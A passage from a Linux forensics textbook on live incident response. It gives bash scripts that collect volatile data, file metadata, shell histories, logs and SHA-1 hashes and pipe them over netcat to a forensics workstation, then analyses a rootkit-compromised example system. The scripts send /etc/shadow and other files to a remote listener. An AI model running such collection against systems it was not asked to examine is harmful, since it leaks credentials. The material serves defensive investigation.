There is also something new in the echo string, the $@ variable. $@ is equal to the entire set of command line parameters passed to the script. We first use $@ to create a header that reads "++++ Sending log for {command with parameters} at {date} ++++". We then use our $() trick yet again to actually run the command and insert its output into our string. Finally, a "---end---" footer is added after the command output.
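To experiment with $@ and $() without a listener running, the same idea can be tried locally. This is a minimal sketch, not the send-log.sh script itself: wrap_output is a hypothetical helper, it prints to the terminal instead of piping to netcat, and it quotes "$@" so that arguments containing spaces stay intact.

```shell
# Sketch: wrap the output of any command in a header and footer.
# wrap_output is a made-up name; nothing is sent over the network.
wrap_output() {
    # "$*" joins the arguments for display; "$@" runs them as a command.
    printf '++++ Sending log for %s at %s ++++\n%s\n---end---\n' \
        "$*" "$(date)" "$("$@")"
}

wrap_output echo hello world
```

The command output lands between the header line and the footer line, which is the layout the listener stores in the case log.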
The last client script is used to send files to the forensics workstation for analysis. It will make a log entry, then send the filename to the appropriate port, then delay a few seconds to give the server time to create a listener to receive the file, and finally send the file. The script for doing this follows.
# send-file.sh
#
# Simple script to send a new file
# to listener on forensics workstation. Intended to be
# used as part of initial live response.
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.
# defaults primarily for testing
[ -z "$RHOST" ] && { export RHOST=localhost; }
[ -z "$RPORT" ] && { export RPORT=4444; }
[ -z "$RFPORT" ] && { export RFPORT=5555; }
[ -z "$RFTPORT" ] && { export RFTPORT=5556; }
usage () {
  echo "usage: $0 <filename>"
  echo "Simple script to send a file to listener"
  exit 1
}
# did you specify a file?
if [ $# -lt 1 ] ; then
  usage
fi
# log it
echo "Attempting to send file $1 at $(date)" | nc $RHOST $RPORT
# send name (quoted so that filenames containing spaces survive)
echo "$(basename "$1")" | nc $RHOST $RFPORT
# give it time
sleep 5
nc $RHOST $RFTPORT < "$1"
As with the other client scripts, there is no she-bang at the beginning of the script so it must be run manually by typing bash ./send-file.sh {filename}. The short circuiting technique is again used to set environment variables to defaults if they have not been set. The script is very straightforward. First, the number of parameters passed in is checked, and if no filename was passed in, the usage statement is displayed. Second, the filename is echoed to the filename listener, which causes the server to start a listener to receive the file. Note that the basename command is used to strip any leading path from the filename (the full path does appear in the log, however). Third, the script sleeps for five seconds to allow the server time to start the listener. This is probably not needed, but it is well worth waiting a few seconds to have a reliable script. Finally, the file is sent to the file listener and then the script exits.
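The effect of basename, along with a simple pre-flight check that is not part of the script above, can be sketched as follows. The function name remote_name is hypothetical, and the readability check is an assumption about what an investigator might want before tying up the file listener.

```shell
# Sketch: compute the name the workstation would receive for a file.
# remote_name is a made-up helper; it refuses paths that are not readable regular files.
remote_name() {
    if [ ! -f "$1" ] || [ ! -r "$1" ]; then
        echo "cannot read regular file: $1" >&2
        return 1
    fi
    basename "$1"
}

sample=$(mktemp)          # temporary file standing in for evidence
remote_name "$sample"     # prints only the last path component
rm -f "$sample"
```

Checking the file first avoids starting a transfer for a path that was mistyped or is unreadable.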
INTRODUCING OUR FIRST SUBJECT SYSTEM
Throughout this book we will work through a few example subject systems. If you wish to follow along, you may download the example images from http://philpolstra.com. This website is also the place to get updates and other materials from this book (and also past and future books). To keep things simple I will install this example system in a virtual machine using VirtualBox running on my Ubuntu 14.04 computer. Recall that I said earlier in this book that using a USB 2.0 response drive is less problematic when trying to mount the drive in a virtual machine.
Our first example is also an Ubuntu 14.04 64-bit system. You have received a call from your new client, a development shop known as Phil's Futuristic Edutainment (PFE) LLC. Your initial interviews revealed that one of the lead developer's computers has been acting strangely and PFE suspects the machine has been hacked. They have no in-house Linux forensics people so you were called in. One of the things that seems to be happening on the subject system is that warnings such as those from Figure 2.13 keep popping up.
FIGURE 2.13
Suspicious system warnings on subject system.
One of the first things you need to do with the subject system is to mount your known-good binaries. The steps required are shown in Figure 2.14. The ifconfig utility is also run as a verification that everything is working correctly.
FIGURE 2.14
Mounting a response drive and loading a known-good shell and binaries.
A sequence of commands to run the known-good binaries and then use the above client scripts is shown in Figure 2.15. Some of the results that appear on the forensics workstation are shown in Figure 2.16 and Figure 2.17.
FIGURE 2.15
Mounting known-good binaries and then running some client scripts on the subject system.
FIGURE 2.16
Partial log entry for the commands shown in Figure 2.15.
FIGURE 2.17
Files created by the commands in Figure 2.15.
COLLECTING VOLATILE DATA
There is plenty of volatile data that can be collected from the subject system. Collecting this data will help you make a preliminary determination as to whether or not there was an incident. Some of the more common pieces of data you should collect are discussed below.
Date and time information
One of the first things you want to collect is the date and time information. Why? The subject system might be in a different time zone from your usual location. Also, computer clocks are known to be bad at keeping good time. If the system has not been synchronized with a time server recently the clock could be off, and you will want to note this skew to adjust times in your reports. Despite its name, the date command outputs not only the date, but the time and time zone as well.
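When noting clock skew it can help to capture the time in more than one form. The following sketch assumes GNU date; record_time is a hypothetical helper and is not one of the scripts from this chapter.

```shell
# Sketch: record the subject system clock in three forms.
# record_time is a made-up name; compare its output with a trusted clock.
record_time() {
    echo "local: $(date)"       # local time with time zone
    echo "utc:   $(date -u)"    # the same instant in UTC
    echo "epoch: $(date +%s)"   # seconds since 1970-01-01 00:00:00 UTC
}

record_time
```

Running the same function on the forensics workstation at the same moment gives a quick estimate of the skew between the two clocks.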
Operating system version
You will need to know the exact operating system and kernel version you are running should you later decide to do memory analysis. The uname -a command will provide you with this information and also the machine name and kernel build timestamp. The results of running this command on the PFE subject system are shown in Figure 2.18.
FIGURE 2.18
Results of running uname on a subject system.
Network interfaces
What network interfaces are on the machine? Is there anything new that shouldn't be there? This might sound like a strange question, but an attacker with physical access could add a wireless interface or USB interface pretty easily. Other strange but less common interfaces are a possibility.
What addresses have been assigned to various interfaces? What about the netmask? Has someone taken a network interface down in order to have traffic routed through something they control or monitor? All of these questions are easily answered using the ifconfig -a command. The results of running ifconfig -a on the subject system are shown in Figure 2.19.
FIGURE 2.19
Results from the ifconfig -a command.
Network connections
What other machines are talking with the subject machine? Are there any suspicious local network connections? Is the system connecting to something on the Internet when it is not supposed to have such access? These questions and more can be answered by running the netstat -anp command. The options a, n, and p are used to specify all sockets, use only numeric IPs (do not resolve host names), and display process identifiers and programs, respectively.
Open ports
Are there any suspicious open ports? Is the system connecting to ports on another machine that is known to be used by malware? These questions are also easily answered by running the netstat -anp command. The results of running this command on the subject system are shown in Figure 2.20.
FIGURE 2.20
Results of running netstat -anp on the subject system.
Malware can affect any of the commands you are running during your initial scan of the subject system. This is true even with known-good binaries, as underlying memory structures may be altered by rootkits and the like. The results of running netstat -anp on the subject system after a rootkit is installed are shown in Figure 2.21. Note that the netstat process is killed and a system warning is also displayed. Every command that fails like this increases the probability that the machine has been compromised.
FIGURE 2.21
The results of running netstat -anp after a rootkit has been installed.
Programs associated with various ports
Some ports are known to be home to malicious services. Even safe ports can be used by other processes. The output of netstat -anp can be used to detect programs using ports they should not be using. For example, malware could use port 80 as it will look like web traffic to a casual observer.
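Once netstat -anp output has arrived in the case log, the listening ports and their owning programs can be pulled out with awk on the forensics workstation. This is a sketch only: listening_tcp is a hypothetical helper, it assumes the usual Linux net-tools column layout, and the sample lines are invented for illustration rather than taken from the subject system.

```shell
# Sketch: list "local address  PID/program" for listening TCP sockets.
# Assumes columns: Proto Recv-Q Send-Q Local Foreign State PID/Program.
listening_tcp() {
    awk '$1 ~ /^tcp/ && $6 == "LISTEN" { print $4, $7 }'
}

# Invented sample input in netstat -anp format.
listening_tcp <<'EOF'
tcp        0      0 0.0.0.0:22          0.0.0.0:*           LISTEN      812/sshd
tcp        0      0 192.168.56.101:22   192.168.56.1:51234  ESTABLISHED 1500/sshd
tcp        0      0 0.0.0.0:80          0.0.0.0:*           LISTEN      2210/xyz
EOF
```

A web port owned by a program that is not a web server, as in the last invented line, is the sort of mismatch worth a closer look.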
Open Files
In addition to asking which programs are using what ports, it can be insightful to see which programs are opening certain files. The lsof -V (list open files with Verbose search) command provides this information. The results of running this command on the subject system are shown in Figure 2.22. As with the netstat command, this will fail if certain rootkits are installed.
FIGURE 2.22
Results of running lsof -V on subject system. Note that this command failed when it was rerun after installation of a rootkit (XingYiQuan).
Running Processes
Are there any suspicious processes running? Are there things being run by the root user that should not be? Are system accounts that are not allowed to login running shells? These questions and more can be answered by running the ps -ef command. The -e option lists processes for everyone and -f gives a full (long) listing. This is another command that might fail if a rootkit has been installed. Partial results of running this command on the subject system are shown in Figure 2.23.
FIGURE 2.23
Results of running ps -ef on the subject system.
Routing Tables
Is your traffic being rerouted through an interface controlled and/or monitored by an attacker? Have any gateways been changed? These and other questions can be answered by examining the routing table. There is more than one way to obtain this information. Two of these ways are to use the netstat -rn and route commands. I recommend running both commands as a rootkit might alert you to its presence by altering the results of one or both of these commands. If you get conflicting results it is strong evidence of a compromise. The results of running both of these commands on the subject system are shown in Figure 2.24.
FIGURE 2.24
Results of running netstat -rn and route on the subject system.
Mounted filesystems
Are any suspicious volumes mounted on the system? Is one of the filesystems suddenly filling up? What are the permissions and options used to mount each partition? Are there unusual temporary filesystems that will vanish when the system is rebooted? The df (disk free) and mount commands can answer these types of questions.
As with many other commands, a rootkit might alter the results of one or both of these commands. Whenever two utilities disagree it is strong evidence of a compromised system. The results of running df and mount on the subject system are shown in Figure 2.25.
FIGURE 2.25
Results of running df and mount on the subject system.
Loaded kernel modules
Are there any trojaned kernel modules? Are there any device drivers installed that the client does not know anything about? The lsmod command provides a list of installed kernel modules. Partial results from running lsmod are shown in Figure 2.26.
FIGURE 2.26
Partial results of running lsmod on the subject system.
Users past and present
Who is currently logged in? What command did each user last run? These questions can be answered by the w command. For those who are not familiar, w is similar to the who command, but it provides additional information. Results for the w command are shown in Figure 2.27.
FIGURE 2.27
Results of running the w command on the subject system.
Who has been logging in recently? This question is answered by the last command. A list of failed login attempts can be obtained using the lastb command. The last command lists when users were logged in, if the system crashed or was shut down while a user was logged in, and when the system was booted. Partial results from running last are shown in Figure 2.28. Note that there are multiple suspicious logins on March 9th. A new user johnn who should not exist has logged on, as has the lightdm system account.
FIGURE 2.28
Partial results of running last on the subject system. The logins by johnn and lightdm are indicators of a compromise.
The results from running lastb on the subject system are shown in Figure 2.29. From the figure it can be seen that John struggled to remember his password on May 20th. The much more interesting thing that can be seen is that the lightdm account had a failed login on March 9th. When you combine this information with the results from last, it would appear that an attacker was testing this new account and did not correctly set things up the first time. Furthermore, it seems likely the john account was used by the attacker.
FIGURE 2.29
Are there any new accounts created by an attacker? Has someone modified accounts to allow system accounts to login? Was the system compromised because a user had an insecure password? Examination of the /etc/passwd and /etc/shadow files helps you answer these questions.
A partial listing of the /etc/passwd file can be found in Figure 2.30. Notice the highlighted portion is for the johnn account. It appears as though an attacker created this account and tried to make it look a lot like the john account for John Smith. Also of note is the hidden home directory for johnn located at /home/.johnn.
FIGURE 2.30
Partial listing of /etc/passwd file from subject system. The highlighted line is for a new johnn account which appears at first glance to be the same as john. Note the hidden home directory.
Looking at the line for the lightdm account in Figure 2.30 we observe that the login shell has been set to /bin/false. This is a common technique used to disable login of some system accounts. From the last command results it is clear that this user was able to login. This is cause for investigation of the /bin/false binary.
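Checks like the ones just described can be partly automated against the copy of /etc/passwd received on the forensics workstation. The following is a minimal sketch under stated assumptions: audit_passwd is a hypothetical helper, the two rules (extra UID 0 accounts and hidden home directories) are only examples of what one might flag, and the sample file is invented to mirror the scenario.

```shell
# Sketch: flag suspicious entries in a passwd-format file.
# Fields: name:password:UID:GID:comment:home:shell
audit_passwd() {
    awk -F: '
        $3 == 0 && $1 != "root" { print "uid0: " $1 }
        $6 ~ "/\\.[^/]*$"       { print "hidden-home: " $1 " " $6 }
    ' "$1"
}

# Invented sample data standing in for the collected file.
sample_passwd=$(mktemp)
cat > "$sample_passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
john:x:1000:1000:John Smith,,,:/home/john:/bin/bash
johnn:x:1001:1001:John Smith,,,:/home/.johnn:/bin/bash
lightdm:x:112:118:Light Display Manager:/var/lib/lightdm:/bin/false
EOF
audit_passwd "$sample_passwd"
rm -f "$sample_passwd"
```

A script like this will not notice a replaced /bin/false, so it complements rather than replaces reading the file by eye.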
Putting it together with scripting
There is no good reason to type all of the commands mentioned above by hand. Since you already are mounting a drive with your known-good binaries, it makes sense to have a script to do all the work for you on your response drive. A simple script for your initial scan follows. The script is straightforward and primarily consists of calling the send-log.sh script presented earlier in this chapter.
# initial-scan.sh
#
# Simple script to collect basic information as part of
# initial live incident response.
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.
usage () {
  echo "usage: $0 [listening host]"
  echo "Simple script to send a log entry to listener"
  exit 1
}
# did you pass too many arguments or ask for help?
if [ $# -gt 1 ] || [ "$1" == "--help" ] ; then
  usage
fi
# did you specify a listener IP?
if [ "$1" != "" ] ; then
  source setup-client.sh $1
fi
# now collect some info!
send-log.sh date
send-log.sh uname -a
send-log.sh ifconfig -a
send-log.sh netstat -anp
send-log.sh lsof -V
send-log.sh ps -ef
send-log.sh netstat -rn
send-log.sh route
send-log.sh lsmod
send-log.sh df
send-log.sh mount
send-log.sh w
send-log.sh last
send-log.sh lastb
send-log.sh cat /etc/passwd
send-log.sh cat /etc/shadow
SUMMARY
We have covered quite a bit in this chapter. Ways of minimizing disturbance to a subject system while determining if there was an incident were discussed. Several scripts to make this easy were presented. We ended this chapter with a set of scripts that can allow you to determine if there was a compromise in mere minutes. In the next chapter we will discuss performing a full live analysis once you have determined that an incident occurred.
CHAPTER 3
Live Analysis
INFORMATION IN THIS CHAPTER:
File metadata
Timelines
User command history
Log file analysis
Hashing
Dumping RAM
Automation with scripting
THERE WAS AN INCIDENT: NOW WHAT?
Based on interviews with the client and limited live response you are convinced there has been an incident. Now what? Now it is time to delve deeper into the subject system before deciding if it must be shut down for dead analysis. The investigation has now moved into the next box as shown in Figure 3.1.
FIGURE 3.1
The High-level Investigation Process.
Some systems can be shut down with minimal business disruption. In our example case the subject system is a developer workstation which is normally not terribly painful to take offline. The only person affected by this is the developer. His or her productivity has already been affected by malware we have discovered. In a case like this you might decide to dump the RAM and proceed to dead analysis. If this is what you have chosen to do, you can safely skip ahead to the section of this chapter on dumping RAM.
GETTING FILE METADATA
At this point in the investigation you should have a rough idea of approximately when an incident may have occurred. It is not unusual to start with some system directories and then go back to examine other areas based on what you find. It is the nature of investigations that you will find little bits of evidence that lead you to other little bits of evidence and so on.
A good place to start the live analysis is to collect file metadata, which includes timestamps, permissions, file owners, and file sizes. Keep in mind that a sophisticated attacker might alter this information. In the dead analysis section of this book we will discuss ways of detecting this and how to recover some metadata that is not easily altered without specialized tools.
As always, we will leverage scripting to make this task easier and minimize the chances for mistakes. The following script builds on shell scripts from Chapter 2 in order to send file metadata to the forensics workstation. The data is sent in semicolon delimited format to make it easier to import into a spreadsheet for analysis.
# send-fileinfo.sh
#
# Simple script to collect file information as part of
# initial live incident response.
# Warning: This script might take a long time to run!
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.
usage () {
  echo "usage: $0 <starting directory>"
  echo "Simple script to send file information to a log listener"
  exit 1
}
if [ $# -lt 1 ] ; then
  usage
fi
# semicolon delimited file which makes import to spreadsheet easier
# printf is access date, access time, modify date, modify time,
# create date, create time, permissions, user id, user name,
# group id, group name, file size, filename and then line feed
# note: find's %C fields report the inode status change time (ctime),
# which is what this script labels as create date and create time
# if you want nice column labels in your spreadsheet, paste the following
# line (minus #) at start of your CSV file
# Access Date;Access Time;Modify Date;Modify Time;Create Date;Create Time;Permissions;UID;Username;GID;Groupname;Size;File
send-log.sh find $1 -printf "%Ax;%AT;%Tx;%TT;%Cx;%CT;%m;%U;%u;%G;%g;%s;%p\n"
The script takes a starting directory because you probably want to limit the scope of this command as it takes a while to run. All of the real work in this script is in the very last line. Many readers have likely used the find utility in its simplest form, which prints out the names of found files. The find command is capable of so much more, as we will see later in this chapter. Here the -printf option has been used, which allows found file attributes to be printed in a specified format. Consult the find man page (accessible by typing man find in a terminal) for the complete list of format codes if you want to customize this script.
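A cut-down version of the format string is a convenient way to get a feel for -printf before running the full script. The sketch below assumes GNU find; file_info and the temporary directory are made up for illustration, and only three of the format codes are used.

```shell
# Sketch: print permissions (octal), size in bytes, and base filename.
# %m, %s, and %f are GNU find -printf format codes; file_info is a made-up name.
file_info() {
    find "$1" -type f -printf '%m;%s;%f\n'
}

meta_dir=$(mktemp -d)                   # scratch directory for the demo
printf 'hello' > "$meta_dir/sample.txt" # a five byte file
chmod 640 "$meta_dir/sample.txt"
file_info "$meta_dir"
```

For the single file created here the function prints 640;5;sample.txt, the same semicolon delimited style the full script sends to the listener.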
A portion of what is received by the forensics workstation when this script is run on the subject system is shown in Figure 3.2. The highlighted line is for /bin/false. According to this information it was modified on March 9th, the date of the suspected compromise. Looking five lines above this entry reveals that false is exactly the same size as bash, which makes no sense for a program that only exists to return a value. The false program is four times the size of the true program, which also exists only to return a value.
FIGURE 3.2
Partial results from running send-fileinfo.sh on /bin directory. The highlighted line indicates that /bin/false was modified about the time of the compromise. Also suspicious is the fact that the file size matches that of /bin/bash five lines above it.
USING A SPREADSHEET PROGRAM TO BUILD A TIMELINE
Should you decide to perform a full dead analysis, a complete timeline can be built using techniques described later in this book. At this stage of the investigation, having a file list that can be sorted by modification, creation, and access times based on output from the script in the previous section can be helpful. While not as nice as a proper timeline that intertwines these timestamps, it can be created in a matter of minutes.
The first step is to open the log.txt file for the case in your favorite text editor on the forensics workstation. If you would like headers on your columns (recommended) then also cut and paste the comment from the send-fileinfo.sh script, minus the leading #, as indicated. Save the file with a .csv extension and then open it in LibreOffice Calc (or your favorite spreadsheet program). You will be greeted with a screen such as that shown in Figure 3.3. Click on each column and set its type as shown in the figure. Failure to do this will cause dates and times to be sorted alphabetically, which is not what you want.
FIGURE 3.3
Importing a CSV file with file metadata into LibreOffice Calc. Note that each column type should be set to allow for proper sorting.
Once the file has been imported it is easily sorted by selecting all of the pertinent rows and then choosing sort from the data menu. The columns are most easily selected by clicking and dragging across the column letters (which should be A-M) at the top of the spreadsheet. The appropriate sort settings to sort by descending access time are shown in Figure 3.4.
FIGURE 3.4
Sorting file metadata by access time.
A similar technique can be used to sort by modification or creation time. It might be desirable to copy and paste this spreadsheet onto multiple tabs (technically worksheets) and save the resulting workbook as a regular Calc file. The easiest way to copy information to a new sheet is to click in the blank square in the upper left corner (above the 1 and to the left of the A), press Control-C, go to the new sheet, click in the same upper left hand square, and then press Control-V.
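For a quick look without a spreadsheet, a rough equivalent of the sort can be done on the command line. This is a sketch of an alternative, not the method described above: it assumes GNU find and sort, uses the %T@ format code (modification time as seconds since the epoch) so that a plain numeric sort works, and mtime_sorted is a hypothetical name.

```shell
# Sketch: list files newest first by modification time.
# %T@ prints the modification time in epoch seconds, which sorts numerically.
mtime_sorted() {
    find "$1" -type f -printf '%T@;%p\n' | LC_ALL=C sort -t';' -k1,1nr
}

sort_dir=$(mktemp -d)                              # scratch directory for the demo
touch -d '2015-03-09 12:00:00' "$sort_dir/older"   # GNU touch date syntax
touch -d '2015-05-20 12:00:00' "$sort_dir/newer"
mtime_sorted "$sort_dir"
```

Swapping %T@ for %A@ or %C@ sorts by access or status change time instead.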
The creation time tab of such a spreadsheet for our subject system is shown in Figure 3.5. The highlighted rows show that the suspicious /bin/false file was created around the time of our compromise and that the XingYiQuan rootkit has been installed. Note that some of the rootkit files have access timestamps around the time of the compromise, yet they have been created and modified later, at least according to the possibly altered metadata.
FIGURE 3.5
File metadata for the /bin directory sorted by creation timestamps. The highlighted rows show that /bin/false was altered about the time of our compromise and that the XingYiQuan rootkit appears to be installed.
EXAMINING USER COMMAND HISTORY
The bash (Bourne Again Shell) shell is the most popular option among Linux users. It is frequently the default shell. Bash stores users' command histories in the hidden .bash_history file in their home directories. The following script uses the find utility to search for these history files in home directories, including the root user's home directory of /root. A sophisticated attacker will delete these files and/or set their maximum size to zero. Fortunately for the investigator, not all attackers know to do this.
# send-history.sh
#
# Simple script to send all user bash history files as part of
# initial live incident response.
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.
usage () {
  echo "usage: $0"
  echo "Simple script to send user history files to a log listener"
  exit 1
}
if [ $# -gt 0 ] ; then
  usage
fi
# find only files, filename is .bash_history
# execute echo, cat, and echo for all files found
send-log.sh find /home -type f -regextype posix-extended -regex \
  '/home/[a-zA-Z.]+/\.bash_history' \
  -exec echo -e "-- dumping history file {} --\n" \; \
  -exec cat {} \; -exec echo -e "-- end of dump for history file {} --\n" \;
# repeat for the admin user
send-log.sh find /root -type f -maxdepth 1 -regextype posix-extended \
  -regex '/root/\.bash_history' \
  -exec echo -e "-- dumping history file {} --\n" \; \
  -exec cat {} \; -exec echo -e "-- end of dump for history file {} --\n" \;
This code requires a little explanation. The easiest new thing to explain is the \ characters at the end of some lines. These are line continuation characters. This allows the script to be more readable, especially when printed in this book. This same line continuation character can be used in other scripting languages such as Python, although it is not necessarily the preferred method for those languages.
Now that we have described the \ characters, let's tackle some of the harder parts of this script. We'll break down the find command piece by piece. The find utility has the ability to search by file type. The command find /home -type f instructs find to search under /home for regular files (not directories, devices, etc.).
In addition to finding files by name, find allows regular expressions to be used for the filename. If you are not familiar with regular expressions, they are powerful ways of defining patterns. A complete tutorial on regular expressions, also called regexes, is well beyond the scope of this book. There are a number of online resources, such as http://www.regular-expressions.info/, for those wanting to know more. The book Mastering Regular Expressions by Jeffrey E. F. Friedl (O'Reilly, 2006) is a great resource for those that prefer a book.
In regular expressions we have characters that match themselves (literals) and those with special meaning (metacharacters). Within the set of metacharacters we have things that match, anchors, and quantity specifiers. Occasionally we want to treat metacharacters as literals and we do this by escaping them. Escaping a character is as simple as prepending the \ character before it.
Some of the more common matching metacharacters are character classes (lists of characters inside square brackets) and the period, which match any character in the list and any character except a newline, respectively. Because the period is a metacharacter, it must be escaped when you want to match a period, as is the case with the regular expression in this script.
Some of the most used quantity specifiers include *, +, and ?, which indicate zero or more, one or more, and zero or one, respectively. Quantity specifiers apply to the thing (literal character, metacharacter, or grouping) just before them. For example, the regular expression A+ means one or more capital A's. As another example, [A-Z]?[a-z]+ would match any word that is written in all lowercase letters with the possible exception of the first letter (breaking it down, it is zero or one uppercase letters followed by one or more lowercase letters).
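These quantity specifiers and the escaped period can be tried out with grep before they are used with find. This is a small sketch: matches is a hypothetical helper, and grep -E -x is used so that, like find -regex, the whole string must match the pattern.

```shell
# Sketch: succeed when the whole string ($2) matches the extended regex ($1).
# LC_ALL=C keeps the [a-z] and [A-Z] ranges to plain ASCII letters.
matches() {
    printf '%s\n' "$2" | LC_ALL=C grep -Eqx -- "$1"
}

matches 'A+' 'AAA'              && echo "A+ matches AAA"
matches '[A-Z]?[a-z]+' 'Linux'  && echo "[A-Z]?[a-z]+ matches Linux"
matches '[A-Z]?[a-z]+' 'LINUX'  || echo "[A-Z]?[a-z]+ does not match LINUX"
matches 'a.b' 'axb'             && echo "unescaped period matches any character"
matches 'a\.b' 'axb'            || echo "escaped period matches only a period"
```

All five messages are printed, which confirms the behavior described for +, ?, character classes, and escaping.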
It is easy to understand the regular expression in our script if we break it down into three parts. The first part "/home/" is a literal string that matches the main directory where users' home directories are stored. The second part "[a-zA-Z.]+" matches one or more lowercase letters or uppercase letters or a period. This should match valid usernames. The final portion is another literal string, but this time with a period escaped. In other words, the regular expression "/\.bash_history" matches the literal string "/.bash_history".
The remainder of the find command runs three commands for each file found using the -exec option. Anywhere you see "{}" the find command will replace it with the name of the file found. Once you know that, it is easy to understand how this works. First we echo a header that includes the filename. Then we cat (type) the file with the second -exec. Finally, a footer is added to the output. After all of the regular user home directories have been scanned, a slightly modified find command is run to print out the root user's bash history if it exists.
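The chain of -exec actions can be tested safely against a scratch directory before it is pointed at real home directories. The sketch below assumes GNU find (which substitutes {} even when it appears inside a larger argument); dump_files and the temporary directory are made up, and -name is used in place of the regular expression to keep the example short.

```shell
# Sketch: header, file contents, and footer for each history file found.
dump_files() {
    find "$1" -type f -name '.bash_history' \
        -exec echo "-- dumping history file {} --" \; \
        -exec cat {} \; \
        -exec echo "-- end of dump for history file {} --" \;
}

hist_dir=$(mktemp -d)                               # stands in for a home directory
printf 'ls\nwhoami\n' > "$hist_dir/.bash_history"   # invented history content
dump_files "$hist_dir"
```

Each -exec runs only if the one before it succeeded, so the footer appears only for files that cat was able to read.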
A portion of the john user's bash history is shown in Figure 3.6. It would appear that the attacker tried to use sed (stream editor) to modify the /etc/passwd file. It seems that he or she had some trouble as they also looked at the man page for sed and ultimately just used vi. A few lines down in this history file we see the XingYiQuan rootkit being installed and the ls command being used to verify that the directory into which it was downloaded is hidden.
FIGURE 3.6
Part of john user's bash history. The lines near the top indicate an attempt to modify the new johnn account information. Further down we see commands associated with the installation of a rootkit.
GETTING LOG FILES
Unlike Windows, Linux still uses plain text log files in many cases. These logs can usually be found in the /var/log directory. Some are found in this directory while others are located in subdirectories. Most logs will have a .log extension or no extension. It is common practice to save several older versions of certain logs. These archived logs have the same base filename, but with .n, where n is a positive number, added. Some of the older logs are also compressed with gzip, giving them a .gz extension as well. For example, if the log file is named "my.log" the most recent archive might be "my.log.1" and older archives named "my.log.2.gz", "my.log.3.gz", etc.
The script below will use the find utility to retrieve current log files from the subject system and send them to the forensics workstation. If after examining the current logs you determine they don't cover a relevant time period for your investigation (which usually means they should have called you much earlier) you can easily use the send-file.sh script presented earlier to send whatever additional logs you deem necessary. Of course, if you have made the decision to perform a dead analysis you are likely better off just waiting to look at these later, as the tools available for dead analysis make this much easier.
# send-logfiles.sh
#
# Simple script to send all logs as part of
# initial live incident response.
# Warning: This script might take a long time to run!
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.
usage () {
  echo "usage: $0"
  echo "Simple script to send log files to a log listener"
  exit 1
}
if [ $# -gt 0 ] ; then
  usage
fi
# find only files, exclude files with numbers as they are old logs
# execute echo, cat, and echo for all files found
send-log.sh find /var/log -type f -regextype posix-extended \
  -regex '/var/log/[a-zA-Z.]+(/[a-zA-Z.]+)*' \
  -exec echo -e "-- dumping logfile {} --\n" \; \
  -exec cat {} \; -exec echo -e "-- end of dump for logfile {} --\n" \;
This script uses the same elements as the previous bash history grabbing script with one exception. There is something new in the regular expression. Parentheses have been used to group things together in order to apply the * quantifier (zero or more). If we break the regular expression into three parts it is easier to understand.
The first part "/var/log/" matches the literal string that is the normal directory where log files can be found. The second chunk "[a-zA-Z.]+" matches one or more letters or a period. This will match any current log files or directories while excluding archived logs (because numbers are not included in the square brackets). The final portion "(/[a-zA-Z.]+)*" is the same as the second chunk, but it is enclosed in parentheses and followed by *. This grouping causes the * quantifier (zero or more) to be applied to everything in the parentheses. The zero case matches logs that are in /var/log, the one case matches logs one level down in a subdirectory, etc.
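The effect of this pattern on a few typical paths can be checked with grep, which avoids touching the subject system while experimenting. This is a sketch: is_current_log is a hypothetical helper, grep -E -x stands in for find's whole-path matching, and the paths are examples only.

```shell
# Sketch: does a path match the pattern used by send-logfiles.sh?
is_current_log() {
    printf '%s\n' "$1" | \
        LC_ALL=C grep -Eqx '/var/log/[a-zA-Z.]+(/[a-zA-Z.]+)*'
}

for path in /var/log/syslog /var/log/apt/history.log \
            /var/log/syslog.1 /var/log/auth.log.2.gz; do
    if is_current_log "$path"; then
        echo "send: $path"
    else
        echo "skip: $path"
    fi
done
```

The first two paths are sent and the two archived logs are skipped. Because the character class holds only letters and the period, a current log whose name contains a digit, hyphen, or underscore would also be skipped and would need to be sent separately.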
Part of the log files for our subject system are shown in Figure 3.7. In the upper part of the figure you can see the tail of the dmesg (device message) log. Notice that this log doesn't use timestamps. Rather, it uses seconds since boot. The start of the syslog (system log) is shown in the lower portion of the figure. It can be seen that syslog does use timestamps. There are other logs that provide no time information whatsoever. Similar to bash history, such logs only provide the order in which things were done.
FIGURE 3.7
Part of the log files dump from the subject system. Notice that some logs contain timestamps while others contain seconds since boot or no time information at all.
COLLECTING FILE HASHES
There are a number of hash databases on the Internet that contain hashes for known-good and known-bad files. Is this the best way of finding malware? Absolutely not! That said, checking hashes is super quick compared to analyzing files with anti-virus software or attempting to reverse engineer them. A good hash database allows you to eliminate a large number of files from consideration. Occasionally you might find malware using hashes. Reducing the number of files you are forced to look at by eliminating known-good files from your analysis is much more useful, however.
Two popular free hash databases include https://www.owasp.org/index.php/OWASP_File_Hash_Repository by the Open Web Applications Security Project (OWASP), and http://www.nsrl.nist.gov/ from the National Institute of Standards and Technology. As of this writing they both support MD5 and SHA-1. Should they support more modern algorithms in the future the script below is easily modified.
# send-sha1sum.sh
#
# Simple script to calculate sha1sum as part of
# initial live incident response.
# Warning: This script might take a long time to run!
# by Dr. Phil Polstra (@ppolstra) as developed for
# PentesterAcademy.com.
usage () {
  echo "usage: $0 <starting directory>"
  echo "Simple script to send SHA1 hash to a log listener"
  exit 1
}
if [ $# -lt 1 ] ; then
  usage
fi
# find only files, don't descend to other filesystems,
# execute command sha1sum -b <filename> for all files found
send-log.sh find $1 -xdev -type f -exec sha1sum -b {} \;
Once again we are using find in this script. A new option, -xdev, has appeared. This option tells find not to descend into directories on other filesystems. The command sha1sum -b {filename} will compute the SHA1 hash for filename while treating it as a binary file.
Partial results from running this script against the /bin directory on the subject machine are shown in Figure 3.8. The highlighted lines show that /bin/bash and /bin/false have the same hash value. It would appear that the attacker overwrote /bin/false with /bin/bash. This is likely how system accounts such as lightdm were able to log in despite the administrator’s attempts to disable login by setting the shell equal to /bin/false.
FIGURE 3.8
Some results from running send-sha1sum.sh against the /bin directory of the subject system. The files /bin/bash and /bin/false have the same hash value, which indicates the attacker overwrote /bin/false with /bin/bash.
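Spotting two identical hashes by eye only works for short listings. The sketch below is one possible way to flag them automatically. The function name find_duplicate_hashes is an assumption made for this example, and it expects the "<hash> *<filename>" lines that sha1sum -b prints.

```shell
#!/bin/bash
# find_duplicate_hashes: read sha1sum-style lines on stdin and print every
# line whose hash (first field) appears more than once in the input.
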